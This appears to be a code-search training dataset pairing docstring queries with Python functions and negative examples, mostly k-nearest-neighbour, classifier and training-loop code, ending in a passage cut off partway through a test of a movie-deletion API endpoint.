"def fit(self):\n # if self.verbose == 1:\n # print ('The list of all perturbation with its probability: \\n')\n # for perturb in range(len(self.p_list)):\n # print('%s perturbation with probability of: %s \\n' %(self.p_list[perturb], self.p_prob[perturb]))\n #p_current, error_vec_current ,error_vec_normal_current = self.minus_log_prob_neuron(self.neuron) # log probability of the current neuron\n p_current, error_vec_current ,error_vec_normal_current = self.kl_distance(self.neuron) # log probability of the current neuron\n acc = 0\n for i in range(self.ite):\n if(self.verbose ==1):\n #p_current, er , error_vec_normal_current = self.minus_log_prob_neuron(self.neuron)\n p_current, er , error_vec_normal_current = self.kl_distance(self.neuron)\n #print('feature of current is: \\n %s' %(self.neuron.features)+ '\\n')\n print('\\n and its probability is: %s' %p_current)\n per = self.select_proposal() # MCMC index\n p_sym, details = self.do_MCMC(per)\n #p_proposal, error_vec_proposal, error_vec_normal_proposal = self.minus_log_prob_neuron(self.neuron)\n p_proposal, error_vec_proposal, error_vec_normal_proposal = self.kl_distance(self.neuron)\n if(self.verbose ==1):\n #print('feature of proposal is: \\n %s' %(self.neuron.features))\n print('\\n and its probability is: %s' %p_proposal)\n a = min(1, p_sym * np.exp(p_current - p_proposal)) # Metropolis choice, notice that the values are minus log probability\n B = self.accept_proposal(a) # the boolean of acceptance\n if(B):\n p_current = p_proposal\n error_vec_current = error_vec_proposal\n error_vec_normal_current = error_vec_normal_proposal\n self.trend[:,i] = error_vec_proposal\n self.trend_normal[:,i] = error_vec_normal_proposal\n acc = acc + 1\n else:\n self.undo_MCMC(per, details)\n self.trend[:,i] = error_vec_current\n self.trend_normal[:,i] = error_vec_normal_current\n if len(self.neuron.nodes_list) == self.neuron.n_soma:\n self.neuron = self.initial_neuron(int(self.n_node/self.initial_seg),self.initial_seg)\n #p_current, error_vec_current, error_vec_normal_current = self.minus_log_prob_neuron(self.neuron)\n p_current, error_vec_current, error_vec_normal_current = self.kl_distance(self.neuron)\n if(self.verbose ==1):\n print ('\\n')\n print('Selected perturbation = ' + per)\n print('the p of acceptance was %s and it was %s that it`s been accepted.'%(a,B))\n print ('\\n')\n if(np.remainder(i,100)==0):\n self.evo.append(deepcopy(self.neuron))\n self.neuron.set_nodes_values()\n print acc",
"def train(self, examples): \r\n self.fitted = False\r\n for case in examples:\r\n if(len(case) < len(self.attrs) + 1):\r\n raise f\"Example {case} is malformed\"\r\n\r\n klass = case[-1]\r\n attributes = np.array(case[:-1])\r\n\r\n if klass not in self.classified:\r\n self.classified[klass] = np.zeros(len(attributes))\r\n self.counts[klass] = 0\r\n \r\n self.classified[klass] += attributes\r\n self.counts[klass] += 1\r\n self.n_examples += len(examples)",
"def train(self, train_data):\n\n clustlab_tr = self.clust_method.fit_predict(train_data) # A_k(X)\n fitclass_tr = self.class_method.fit(train_data, clustlab_tr)\n classlab_tr = fitclass_tr.predict(train_data)\n misclass = zero_one_loss(clustlab_tr, classlab_tr)\n return misclass, fitclass_tr, clustlab_tr",
"def learn(self, Xtrain, ytrain):\n Ktrain = None\n\n ### YOUR CODE HERE\n #Creating centers and sending to kernel\n \n self.n = Xtrain[0:self.num_of_center]\n Ktrain = self.kernel(Xtrain, self.n)\n ### END YOUR CODE\n\n self.weights = np.zeros(Ktrain.shape[1],)\n\n ### YOUR CODE HERE\n for i in range(self.iteration):\n self.weights -= (self.learning_rate / (i+1)) * self.kernel_logit_cost_grad(self.weights, Ktrain, ytrain)\n #print(\"Loss: \"+str(self.kernel_logit_cost(self.weights, Ktrain, ytrain)))\n ### END YOUR CODE\n\n self.transformed = Ktrain # Don't delete this line. It's for evaluation.",
"def generate_train(self):\n if not hasattr(self, 'users_products_count_rdcd'):\n self.users_products_count_rdcd = load_pickle(prepr.data_sources[\"users_products_count_rdcd\"])\n X_train = self.users_products_count_rdcd.loc[(self.users_products_count_rdcd['eval_set'] == 'train') & self.users_products_count_rdcd['user_id'].isin(self.users_for_train)]\n y_train = self.users_products_count_rdcd.loc[(self.users_products_count_rdcd['eval_set'] == 'test') & self.users_products_count_rdcd['user_id'].isin(self.users_for_train)]\n pickle.dump(X_train, open(\"../pickles/X_train.p\", \"wb\"))\n pickle.dump(y_train, open(\"../pickles/y_train.p\", \"wb\"))",
"def train(self, training_examples, labels):\r\n\r\n # go through the training examples and count the occurences\r\n for training_example, label in zip(training_examples, labels):\r\n self.learn(training_example, label)",
"def forward_prop(self,X_data): # Computes the forward propagation on all training examples\n W=self.W\n X=X_data\n b=self.b\n self.Z=np.dot(W.T,X)+b # computes Z=np.dot(W.T,X)+b\n self.A=self.sigmoid(self.Z) # computes A=sigmoid(Z)",
"def _pre_training(self):\n print(\"\\nLayer pre-training started. \\n\")\n self.U_s = []\n self.V_s = []\n for i in tqdm(range(self.p), desc=\"Layers trained: \", leave=True):\n self._setup_z(i)\n U, V = self._sklearn_pretrain(i)\n self.U_s.append(U)\n self.V_s.append(V)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Runs KNN prediction/estimation for each point x in x_set. Returns an array containing the predicted classes for each input point.
|
def predict(self, x_set):
def classify(x):
# Pick top-voted label among the k nearest neighbors.
label_votes = self.knn_label_votes(x)
return max(label_votes, key=label_votes.get)
return np.array(list(map(classify, x_set)))
|
[
"def classify(self, testing_set):\n class_predictions = []\n class_actuals = []\n\n for attribute in testing_set.itertuples(index=False): # iterates through each attribute in the testing set\n class_probabilities = []\n actual_class = None\n\n for category in self.probability_table.keys():\n total_probability = 1\n category_probability = self.probability_table[category][\"Probability\"]\n\n for index in range(testing_set.shape[1]): # iterates through each index of the rows of the testing set\n column = testing_set.columns[index]\n val = attribute[index]\n\n if column != \"Class\" and val in self.probability_table[category][\"Attributes\"][column]:\n total_probability *= self.probability_table[category][\"Attributes\"][column][val]\n elif column != \"Class\" and val not in self.probability_table[category][\"Attributes\"][column]:\n self.probability_table[category][\"Attributes\"][column][val] = self._calculateAttributeProbability(0)\n total_probability *= self.probability_table[category][\"Attributes\"][column][val]\n elif column == \"Class\":\n actual_class = val\n\n total_probability = total_probability * category_probability\n class_probabilities.append((category, total_probability))\n classification = None\n highest_probability = 0\n\n for prob in class_probabilities:\n if prob[1] >= highest_probability:\n classification = prob[0]\n highest_probability = prob[1]\n\n class_predictions.append(classification)\n class_actuals.append(actual_class)\n\n return class_actuals, class_predictions",
"def predict(self, X: np.ndarray) -> np.ndarray:\n return np.array([self._classify(x) for x in X])",
"def predict(self, x, **kwargs):\n # compute predictions from different models of the ensemble\n predictions_list = np.array([classifier.predict(x) for classifier in self.ensemble_classifiers])\n # sum the probabilities across all predictors\n ensemble_predictions = np.sum(predictions_list, axis=0)\n return ensemble_predictions",
"def predict(self, x):\n labels = np.zeros((x.shape[0]), dtype=int)\n datasetLen=x.shape[0]\n miniResult=np.full(datasetLen,np.inf)\n # print(miniResult.shape)\n centersCopy=self.centers.copy()\n \n centerIndex=0\n for center in centersCopy:\n centerMatrix=np.tile(center,(datasetLen,1))\n result=np.square((x-centerMatrix))\n result=np.sum(result,axis=1) \n miniResult=np.minimum(miniResult,result)\n # print(miniResult)\n for i in range(miniResult.shape[0]):\n if(miniResult[i]==result[i]):\n labels[i]=centerIndex\n # print(labels)\n centerIndex+=1\n # for index in range(datasetLen):\n # data=x[index]\n # print(data.shape) \n\n ##################################\n # YOUR CODE GOES HERE #\n ##################################\n return labels",
"def predict(self, x):\n # Create an array to store predictions in. Add an extra dimension if this\n predictions = []\n # Loop over the cross-validation models\n for i, model in enumerate(self._models):\n\n # Make and store predictions\n predictions.append(model.predict(x).flatten())\n predictions=np.asarray(predictions)\n # Get the mean and standard deviation of predictions\n mean_preds = np.mean(predictions, axis = 0)\n stdev_preds = np.std(predictions, axis = 0)\n # Return the mean predictions and standard deviation of predictions\n return mean_preds, stdev_preds",
"def predict(self, x):\n predictionList=[]\n if self._model.loaded:\n for xValue in x:\n systemLabel=self._model.infer_topic(xValue)\n result=self._model.topicLabelling[systemLabel]\n predictionList.append(int(result))\n else:\n self._util.logError('TopicClusteringPredictionModel','Model needs to be loaded before prediction')\n\n return predictionList",
"def classify1(self,X):\n prediction = self.classify.predict(X)\n \n return prediction",
"def predict_proba(self, test_data, k):\r\n result = []\r\n\r\n for test_point in test_data:\r\n\r\n # Initializing probability array so that every class has atleast a non-zero probability\r\n prob_array = np.full((10,), 0.01)\r\n\r\n # Getting k nearest labels\r\n distances = self.l2_distance(test_point)\r\n k_nearest_indices = {}\r\n for i in range(len(distances)):\r\n if len(k_nearest_indices) != k:\r\n k_nearest_indices[i] = distances[i]\r\n else:\r\n max_index = max(k_nearest_indices, key=k_nearest_indices.get)\r\n if distances[i] < distances[max_index]:\r\n k_nearest_indices.pop(max_index)\r\n k_nearest_indices[i] = distances[i]\r\n labels = []\r\n for key in k_nearest_indices:\r\n labels.append(self.train_labels[key])\r\n\r\n # Getting prob_array for the individual test point\r\n for i in range(10):\r\n if labels.count(i) != 0:\r\n prob_array[i] = labels.count(i) / k\r\n result.append(prob_array)\r\n\r\n return result",
"def knn_predict(new_point, points, point_classes, k=5):\n k_nearest = find_nearest_neighbors(new_point, points, k)\n return majority_vote(point_classes[k_nearest])",
"def predict(self, test_set: list):\n trees = self.project.load_trees()\n # for cid in trees:\n # if cid not in test_set:\n # del trees[cid]\n results = []\n i = 0\n logger.info('predicting %d cascades ...', len(test_set))\n\n for cid in test_set:\n initial_tree = trees[cid].copy(self.initial_depth)\n res = self.predict_one_sample(initial_tree, self.threshold, self.graph, self.max_step)\n i += 1\n logger.info('%d cascades predicted', i)\n results.append(res)\n\n return results",
"def knnClassifier(Xtest, Xtrain, ytrain, k):\n Ntest = Xtest.shape[0]\n Ntrain = Xtrain.shape[0]\n Xtest = np.reshape(Xtest, (Ntest, -1))\n Xtrain = np.reshape(Xtrain, (Ntrain, -1))\n same = np.array_equal(Xtest, Xtrain)\n if same: # if train and test is same, account for over estimation of\n # performance by one more neighbour and zero weight to the first\n classifier = KNeighborsClassifier(n_neighbors = k+1, weights=_weight_func, \n algorithm='brute')\n classifier.fit(Xtrain, ytrain)\n pred = classifier.predict(Xtest)\n else:\n classifier = KNeighborsClassifier(n_neighbors = k, algorithm='brute')\n classifier.fit(Xtrain, ytrain)\n pred = classifier.predict(Xtest)\n return pred",
"def run(X_train, y_train, X_test, y_test, _k=[1]):\n # Compute distances:\n dists = mlBasics.compute_euclidean_distances(X_train, X_test)\n\n print \"Distances computed\"\n\n # For all k,\n for k in _k:\n\n # Predict labels\n y_test_pred = mlBasics.predict_labels(dists, y_train, k=k)\n\n print '{0:0.02f}'.format(np.mean(y_test_pred == y_test) * 100), \"of test examples classified correctly. k =\", key",
"def _predict_scores_fixed(self, X, **kwargs):\n # model = self._construct_scoring_model(n_objects)\n X = self.get_set_representation(X, kwargs)\n n_instances, n_objects, n_features = X.shape\n self.logger.info(\"After applying the set representations features {}\".format(n_features))\n input_layer_joint = Input(shape=(n_objects, n_features), name=\"input_joint_model\")\n scores = []\n\n inputs = [create_input_lambda(i)(input_layer_joint) for i in\n range(n_objects)]\n\n for i in range(n_objects):\n joint = inputs[i]\n for j in range(self.n_hidden_joint_layers):\n joint = self.joint_layers[j](joint)\n scores.append(self.scorer(joint))\n scores = concatenate(scores, name=\"final_scores\")\n joint_model = Model(inputs=input_layer_joint, outputs=scores)\n predicted_scores = joint_model.predict(X)\n self.logger.info(\"Done predicting scores\")\n return predicted_scores",
"def knnclassifier(xTr,yTr,xTe,k):\n if k > len(xTr):\n k = len(xTr)\n indices, distances = findknn(xTr,xTe,k)\n yTr = np.array(yTr)\n a = yTr[indices]\n preds = mode(a, axis=0)\n return preds[0].flatten()",
"def predict(self, X):\n proba = {}\n total_probabilities = np.array([])\n for classifier_index in range(1, 5):\n clf = self.classifiers[classifier_index]\n proba[classifier_index] = clf.predict_proba(X)[:, 1]\n for class_index in range(1, 6):\n if class_index == 1:\n # probability = 1 - probability(bigger than 1)\n total_probabilities = np.vstack(1 - proba[class_index])\n elif 1 < class_index < 5:\n # probability = probabillity(bigger than i) - probability(bigger than i-1)\n total_probabilities = np.column_stack((total_probabilities, (proba[class_index-1]-proba[class_index])))\n elif class_index == 5:\n # probability = probability(bigger than 4)\n total_probabilities = np.column_stack((total_probabilities, (proba[class_index-1])))\n # add one to the results because indexes start at 0, but classes range in (1 - 5)\n results = np.argmax(total_probabilities, axis=1) + 1\n return results",
"def knn(data_points, classes, k, threshold=-1):\n\tpoints = find_nn(data_points, k, threshold=threshold)\n\tnew_classes, miss_class = find_new_classes(points, classes)\n\tmiss_class = 0\n\tfor i in range(len(points)):\n\t\tif classes[points[i].point] != new_classes[i]:\n\t\t\tmiss_class += 1\n\treturn classes, miss_class / len(data_points)",
"def predict(self, X):\n probabilities = self.predict_probability(X)\n\n def classForProbability(probability):\n if probability > 0.5:\n return self.classOneLabel\n return self.classZeroLabel\n\n return numpy.array([\n classForProbability(p) for p in probabilities\n ])",
"def knn(training, test, k, output):\n\tpredicted = [] #the matrix holding the predicted outcomes using knn\n\tfor array1 in test:\n\t\toutcomes = defaultdict(int)\n\t\tdistances = {}\n\t\tmax_value = 0\n\t\tfor array2 in training:\n\t\t\tdistances[np.linalg.norm(array2[1:]-array1)] = array2\n\t\tdistances = sorted(distances.items())\n\t\tfor index in range(k):\n\t\t\tarray = distances[index][1]\n\t\t\t# print array, array[0], output[array[0]]\n\t\t\toutcomes[output[int(array[0])][0]] += 1\n\t\tfor key, value in outcomes.items():\n\t\t\tif value > max_value:\n\t\t\t\tmax_value = value\n\t\t\t\tmax_key = key\n\t\tpredicted.append(max_key)\n\treturn np.transpose(np.array([predicted]))",
"def predict(self, test_data, actual_labels):\n # Obtain cluster number for every test item\n classes = []\n\n cluster_no = self._min_dist_pos(test_data[0], self._centroids)\n\n for i, item in enumerate(test_data):\n cluster_no = self._min_dist_pos(item, self._centroids)\n classes.append(cluster_no)\n\n evaluator = ClassificationEvaluator(\n pred_labels = np.array(classes),\n actual_labels = actual_labels\n )\n\n metrics = evaluator.evaluate()\n return np.array(classes), metrics"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Computes the a posteriori probability p(wi|x) for each class wi by dividing the number of votes of each label among the k nearest neighbors by K.
|
def compute_a_posteriori(self, x):
# Compute label votes for k nearest neighbors.
knn_label_votes = self.knn_label_votes(x)
# p(wi|x) = num_votes(wi)/K. Map label index into probability.
return np.array(list(map(
lambda label: knn_label_votes.get(label, 0) / float(self.K),
range(self.num_classes),
)))
|
[
"def knn(p, data, k):\n \n \"\"\" Steps:\n 1. Iterate through samples in data and store the \n distance from p in the dictionary \"distance\"; key is the \n distance, value is the sample.\n 2. Creat a sorted list of samples according to ascending\n order of the distances.\n 3. In the dictioary \"label_votes\", stores number of votes\n in each label among the top-k nearest samples\n 4. Assign p the most popular label\n \"\"\"\n\n max_label = util.LABELS[0]\n p.setLabel(max_label)\n # above forces a fixed label: remove them\n # replace knn_helper.knn(p, data, k) with your own logic\n print(p)\n knn_helper.knn(p, data, k)\n print(p)",
"def knn_label_votes(self, x):\n # Evaluate the distance L2 of x to all training points.\n dist = np.linalg.norm(x - self.x_train, axis=1)\n \n # Compute the indices of the k nearest points (with respect to x_train).\n # Use negative distances to force min-heap behave like a max-heap.\n nearest_k_indices = []\n for i in range(len(dist)):\n heapq.heappush(nearest_k_indices, (-dist[i], i))\n if len(nearest_k_indices) > self.K: heapq.heappop(nearest_k_indices)\n\n # Count number of votes for each label.\n label_votes = {}\n for label in [self.w_train[k] for (_, k) in nearest_k_indices]:\n label_votes[label] = label_votes.get(label, 0) + 1\n return label_votes",
"def knn_predict(new_point, points, point_classes, k=5):\n k_nearest = find_nearest_neighbors(new_point, points, k)\n return majority_vote(point_classes[k_nearest])",
"def predictkNNLabelsReg(closest_neighbors, y_train):\n total = 0;\n for i in range(len(closest_neighbors)):\n total = total + y_train[closest_neighbors[i]][0];\n LabelPrediction = total/len(closest_neighbors)\n return LabelPrediction",
"def knn(data_points, classes, k, threshold=-1):\n\tpoints = find_nn(data_points, k, threshold=threshold)\n\tnew_classes, miss_class = find_new_classes(points, classes)\n\tmiss_class = 0\n\tfor i in range(len(points)):\n\t\tif classes[points[i].point] != new_classes[i]:\n\t\t\tmiss_class += 1\n\treturn classes, miss_class / len(data_points)",
"def predict_proba(self, test_data, k):\r\n result = []\r\n\r\n for test_point in test_data:\r\n\r\n # Initializing probability array so that every class has atleast a non-zero probability\r\n prob_array = np.full((10,), 0.01)\r\n\r\n # Getting k nearest labels\r\n distances = self.l2_distance(test_point)\r\n k_nearest_indices = {}\r\n for i in range(len(distances)):\r\n if len(k_nearest_indices) != k:\r\n k_nearest_indices[i] = distances[i]\r\n else:\r\n max_index = max(k_nearest_indices, key=k_nearest_indices.get)\r\n if distances[i] < distances[max_index]:\r\n k_nearest_indices.pop(max_index)\r\n k_nearest_indices[i] = distances[i]\r\n labels = []\r\n for key in k_nearest_indices:\r\n labels.append(self.train_labels[key])\r\n\r\n # Getting prob_array for the individual test point\r\n for i in range(10):\r\n if labels.count(i) != 0:\r\n prob_array[i] = labels.count(i) / k\r\n result.append(prob_array)\r\n\r\n return result",
"def probability_labels(self, labels):\n\t\tlabels = labels[0]\n\t\tprobability = 1\n\t\tfor (i,j) in self.spans:\n\t\t\tif (i,j) in labels.keys():\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprobability = probability * 0.5\n\t\tself.probability = probability\n\t\treturn",
"def predict(self, x_set):\n def classify(x):\n # Pick top-voted label among the k nearest neighbors.\n label_votes = self.knn_label_votes(x)\n return max(label_votes, key=label_votes.get)\n\n return np.array(list(map(classify, x_set)))",
"def postal_problem():\n labels, points, testlabels, testpoints = np.load('PostalData.npz').items()\n\n y = [1,4,10]\n x = ['uniform','distance']\n for i in y:\n for j in x: \n nbrs = neighbors.KNeighborsClassifier(n_neighbors = i, weights = j)\n nbrs.fit(points[1], labels[1])\n prediction = nbrs.predict(testpoints[1])\n percent = np.average(prediction/testlabels[1])\n print \"n_neighbors = \" + str(i) + \", weights = \" + str(j) + \": \" + str(percent) + \"\\n\"",
"def label_probability(self,label):\n total = self.n\n quantity = 0\n for ex in self.data:\n if ex.label == label:\n quantity+=1\n prob = quantity/total\n return prob",
"def nb_predict(X, class_prob, class_word_prob):\r\n Ypred = []\r\n ###################################################\r\n # Q8.1 Edit here\r\n ###################################################\r\n for i in range(len(X)):\r\n listinx = X[i]\r\n tempp = []\r\n for indexclass in range(len(class_prob)):\r\n p = calculatelog(class_prob[indexclass])\r\n for j in range(len(listinx)):\r\n if class_word_prob[indexclass, listinx[j][0]] == -1:\r\n continue\r\n p += listinx[j][1] * calculatelog(class_word_prob[indexclass, listinx[j][0]])\r\n\r\n tempp.append(p)\r\n\r\n if(tempp[0] > tempp[1]):\r\n Ypred.append(0)\r\n else:\r\n Ypred.append(1)\r\n\r\n return Ypred",
"def nearest_neighbor_classify(train_image_feats,\n train_labels,\n test_image_feats,\n k=3):\n\n pred_labels = []\n\n #############################################################################\n # TODO: YOUR CODE HERE\n #############################################################################\n M, d = test_image_feats.shape\n dist = pairwise_distances(test_image_feats, train_image_feats)\n for i in range(M):\n sorted = np.argsort(dist[i])\n sorted = sorted[1:]\n list = [train_labels[i] for i in sorted[:k]]\n list_set = set(list)\n n = list.count\n pred_labels.append(max(list_set, key = n))\n \n #############################################################################\n # END OF YOUR CODE\n #############################################################################\n return pred_labels",
"def kfolds_making(dataset,label,K=10):\n #data = dataset-1\n #label = dataset-1\n dataset, label = shuffle(dataset, label, random_state=0)\n print(label)\n kfold_DT = KFold(K)\n\n performances_DT = 0\n performances_NN = 0\n performances_SVM = 0\n performances_KNN = 0\n #print()\n\n i=0\n for trn_idx, tst_idx in kfold_DT.split(dataset):\n print(i)\n i = i+1\n performances_DT = performances_DT + decision_tree2(dataset,label.ravel(),trn_idx,tst_idx)\n performances_NN = performances_NN + nn2(dataset,label.ravel(),trn_idx,tst_idx)\n performances_SVM = performances_SVM + svm2(dataset,label.ravel(),trn_idx,tst_idx)\n performances_KNN = performances_KNN + knn(dataset,label.ravel(),trn_idx,tst_idx)\n\n \n performances_DT = performances_DT/K\n performances_NN = performances_NN/K\n performances_SVM = performances_SVM/K\n performances_KNN = performances_KNN/K\n\n print(round(performances_DT, 3), \"accuracy for decision tree\")\n print(round(performances_NN, 3), \"accuracy for multi layer perceptron\")\n print(round(performances_SVM, 3), \"accuracy for support vector classifier \")\n print(round(performances_KNN, 3), \"accuracy for K nearest neighbors \")",
"def prob_atleast_k(num_balls, num_bins, k):\n bnded = pigeonhole_bounded( num_balls, num_bins, max_balls_per_bin = k-1)\n tot = pigeonhole( num_balls, num_bins )\n return 1 - bnded / tot",
"def __KNNAlgorithm(self, data):\r\n\r\n\t\t# get the list of distances to other values\r\n\t\tdistance_list = self.__get_distance_list(data)\r\n\t\t\r\n\t\t# take the classes of the closest k neighbors\r\n\t\tclosest_k_classes = [distance_list[i][1] for i in range(self.K)]\r\n\r\n\t\treturn self.__find_most_frequent(closest_k_classes)",
"def KNeighbors(self):\n\n name = \"KNeighbors\"\n knc = KNeighborsClassifier(n_neighbors=4)\n knc.fit(self.X_train, self.y_train)\n\n y_pred = knc.predict(self.X_test)\n\n print(\"K-Neighbours Classifier\")\n\n # Display results\n cv_scores = self._repr(knc, y_pred)\n\n # Save the file\n self.saveModel(knc, name)\n\n # Append value to the results\n self.results.append((name, cv_scores.mean()))\n\n return",
"def _compute_weights(labels: Collection):\n class_support = np.unique(labels, return_counts=True)[1]\n class_frequencies = class_support / len(labels)\n # Class weights are the inverse of the class frequencies\n class_weights = 1 / class_frequencies\n # Normalize vector to sum up to 1.0 (in case the Loss function does not do it)\n class_weights /= class_weights.sum()\n return class_weights",
"def knnclassifier(xTr,yTr,xTe,k):\n if k > len(xTr):\n k = len(xTr)\n indices, distances = findknn(xTr,xTe,k)\n yTr = np.array(yTr)\n a = yTr[indices]\n preds = mode(a, axis=0)\n return preds[0].flatten()",
"def test_predict_proba_classifier(self):\n\n neigh = KNeighborsClassifier(metric=lp_distance)\n\n neigh.fit(self.X, self.y)\n probs = neigh.predict_proba(self.X)\n\n np.testing.assert_array_almost_equal(probs, self.probs)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Finds the k nearest neighbors, and counts their labels. Returns a dict mapping each label to their count.
|
def knn_label_votes(self, x):
# Evaluate the distance L2 of x to all training points.
dist = np.linalg.norm(x - self.x_train, axis=1)
# Compute the indices of the k nearest points (with respect to x_train).
# Use negative distances to force min-heap behave like a max-heap.
nearest_k_indices = []
for i in range(len(dist)):
heapq.heappush(nearest_k_indices, (-dist[i], i))
if len(nearest_k_indices) > self.K: heapq.heappop(nearest_k_indices)
# Count number of votes for each label.
label_votes = {}
for label in [self.w_train[k] for (_, k) in nearest_k_indices]:
label_votes[label] = label_votes.get(label, 0) + 1
return label_votes
|
[
"def predictkNNLabelsReg(closest_neighbors, y_train):\n total = 0;\n for i in range(len(closest_neighbors)):\n total = total + y_train[closest_neighbors[i]][0];\n LabelPrediction = total/len(closest_neighbors)\n return LabelPrediction",
"def neighbor_counts(living):\n n = collections.Counter()\n for x in map(neighbors, living):\n n.update(x)\n return dict(n)",
"def KNeighbors(self):\n\n name = \"KNeighbors\"\n knc = KNeighborsClassifier(n_neighbors=4)\n knc.fit(self.X_train, self.y_train)\n\n y_pred = knc.predict(self.X_test)\n\n print(\"K-Neighbours Classifier\")\n\n # Display results\n cv_scores = self._repr(knc, y_pred)\n\n # Save the file\n self.saveModel(knc, name)\n\n # Append value to the results\n self.results.append((name, cv_scores.mean()))\n\n return",
"def nearest_neighbor_classify(train_image_feats,\n train_labels,\n test_image_feats,\n k=3):\n\n pred_labels = []\n\n #############################################################################\n # TODO: YOUR CODE HERE\n #############################################################################\n M, d = test_image_feats.shape\n dist = pairwise_distances(test_image_feats, train_image_feats)\n for i in range(M):\n sorted = np.argsort(dist[i])\n sorted = sorted[1:]\n list = [train_labels[i] for i in sorted[:k]]\n list_set = set(list)\n n = list.count\n pred_labels.append(max(list_set, key = n))\n \n #############################################################################\n # END OF YOUR CODE\n #############################################################################\n return pred_labels",
"def knn(p, data, k):\n \n \"\"\" Steps:\n 1. Iterate through samples in data and store the \n distance from p in the dictionary \"distance\"; key is the \n distance, value is the sample.\n 2. Creat a sorted list of samples according to ascending\n order of the distances.\n 3. In the dictioary \"label_votes\", stores number of votes\n in each label among the top-k nearest samples\n 4. Assign p the most popular label\n \"\"\"\n\n max_label = util.LABELS[0]\n p.setLabel(max_label)\n # above forces a fixed label: remove them\n # replace knn_helper.knn(p, data, k) with your own logic\n print(p)\n knn_helper.knn(p, data, k)\n print(p)",
"def _count_neighbours(self):\n for point in self._points:\n self._neighbour_counter[point] += len(point.cluster.points)",
"def k_neighbors():\n train_x, test_x, train_y, test_y = prepare_data()\n train_y = train_y.reshape((train_y.shape[0], ))\n \n clf = KNeighborsClassifier(n_neighbors=3)\n \n start = time.time()\n clf.fit(train_x, train_y)\n end = time.time()\n\n y_pred = clf.predict(test_x)\n\n time_ = end - start\n accuracy = 100 * accuracy_score(test_y, y_pred)\n\n print(\"### KNN ###\\n\")\n print(\"Training lasted %.2f seconds\" % time_)\n print(\"Accuracy = %.2f\" % (accuracy))\n\n return(time_, accuracy)",
"def __KNNAlgorithm(self, data):\r\n\r\n\t\t# get the list of distances to other values\r\n\t\tdistance_list = self.__get_distance_list(data)\r\n\t\t\r\n\t\t# take the classes of the closest k neighbors\r\n\t\tclosest_k_classes = [distance_list[i][1] for i in range(self.K)]\r\n\r\n\t\treturn self.__find_most_frequent(closest_k_classes)",
"def get_neighbor_weights(gps_loc, N, k):\n\n weights = np.zeros((N, N))\n\n for i in xrange(N):\n # Finding the k-nearest neighbors.\n neighbors = np.vstack(sorted([(j, np.linalg.norm(gps_loc[i] - gps_loc[j])) for j in xrange(N)],\n key=lambda x: x[1])[1:k+1])[:, 0].astype('int')\n weights[i, neighbors] = 1\n\n return weights",
"def count_kmers(s, k):\n d = collections.defaultdict(int)\n for i in xrange(len(s)-(k-1)):\n d[s[i:i+k]] += 1\n return d",
"def test_kneighbors(self):\n\n nn = NearestNeighbors()\n nn.fit(self.X)\n\n knn = KNeighborsClassifier()\n knn.fit(self.X, self.y)\n\n knnr = KNeighborsRegressor()\n knnr.fit(self.X, self.modes_location)\n\n for neigh in [nn, knn, knnr]:\n\n dist, links = neigh.kneighbors(self.X[:4])\n\n np.testing.assert_array_equal(links, [[0, 7, 21, 23, 15],\n [1, 12, 19, 18, 17],\n [2, 17, 22, 27, 26],\n [3, 4, 9, 5, 25]])\n\n dist_kneigh = lp_distance(self.X[0], self.X[7])\n\n np.testing.assert_array_almost_equal(dist[0, 1], dist_kneigh)\n\n graph = neigh.kneighbors_graph(self.X[:4])\n\n for i in range(30):\n self.assertEqual(graph[0, i] == 1.0, i in links[0])\n self.assertEqual(graph[0, i] == 0.0, i not in links[0])",
"def get_class_number_and_key_dict(freq_dict, threshold = 50):\r\n labels_key = {}\r\n key_index = 0\r\n result = 0\r\n for label in freq_dict:\r\n if freq_dict[label] >= threshold:\r\n result = result + 1\r\n labels_key[label] = key_index\r\n key_index = key_index + 1\r\n\r\n N_CLASS = result\r\n print(\"Keys and Values are:\")\r\n\r\n for k, v in labels_key.items():\r\n print(k, \" :\", v)\r\n\r\n return result, labels_key",
"def keep_k_nearest(self):\n start = time.time()\n dist = self.compute_euclidean_distances()\n idx = dist.argsort()\n neighbours = idx[:, :self.knn + 1 ]\n dist_knn = np.zeros((self.n_data, self.n_data))\n for i in range(self.n_data):\n dist_knn[i, neighbours[i, :]] = dist[i, neighbours[i, :]]\n end = time.time()\n print(\"Compute keep k nearest: \" + \"{:.4f}\".format(end - start))\n return dist_knn",
"def classify_with_knn(data_set, labels, in_val, k=2):\n distance = find_euclidean_distance(array(data_set), array(in_val))\n values = zip(labels, distance)\n sorted_values = sorted(values, key=lambda value: value[1])\n if k > 0:\n sorted_values = sorted_values[:k]\n return sorted_values",
"def knn(data_points, classes, k, threshold=-1):\n\tpoints = find_nn(data_points, k, threshold=threshold)\n\tnew_classes, miss_class = find_new_classes(points, classes)\n\tmiss_class = 0\n\tfor i in range(len(points)):\n\t\tif classes[points[i].point] != new_classes[i]:\n\t\t\tmiss_class += 1\n\treturn classes, miss_class / len(data_points)",
"def predict_train_data(self, temp, train_index):\n neighbors = []\n k = [1, 9, 19, 29, 39, 49, 59, 69, 79, 89, 99]\n for neighbor in k:\n err_count = 0\n for i in range(len(neighbors), neighbor):\n neighbors.append(temp[i][1])\n dict = Counter(neighbors)\n dict = dict.most_common(1)[0][0]\n if not dict == self.train_label[train_index]:\n err_count += 1\n self.train_error[neighbor] += err_count",
"def num_labels(self):\n return len(self.get_label_keys(only_images=True))",
"def globalNeighbors (listAtom, count):\n\n for atom in listAtom:\n nbNeighbor = numberNeigthbor(atom[\"neighbors\"])\n for neighbor in atom[\"neighbors\"]:\n # print count\n neighbor_classif = structure.classificationATOM(neighbor)\n count[\"allNumberNeighbors\"][neighbor_classif] = count[\"allNumberNeighbors\"][neighbor_classif] + 1\n if not nbNeighbor in count.keys():\n count[nbNeighbor] = structure.countClassificationAtoms()\n\n if neighbor_classif in count[nbNeighbor].keys():\n count[nbNeighbor][neighbor_classif] = count[nbNeighbor][neighbor_classif] + 1\n\n else:\n count[nbNeighbor][\"others\"] = count[nbNeighbor][\"others\"] + 1",
"def num_labels(self): # -> int:\n ..."
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test delete movies endpoint
|
def test_delete_movies(self):
response = self.client.delete('/movies/1')
